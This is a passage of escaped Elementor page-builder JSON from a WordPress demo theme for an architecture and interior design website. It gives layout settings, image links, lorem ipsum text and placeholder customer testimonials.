\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT INTERIOR\",\"title\":\"We provide the best\\narchitect & interior\\ndesign services\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Our signature design process comes standard\\u2026refresh, remodel, new and enjoyable design experience\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Detail\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\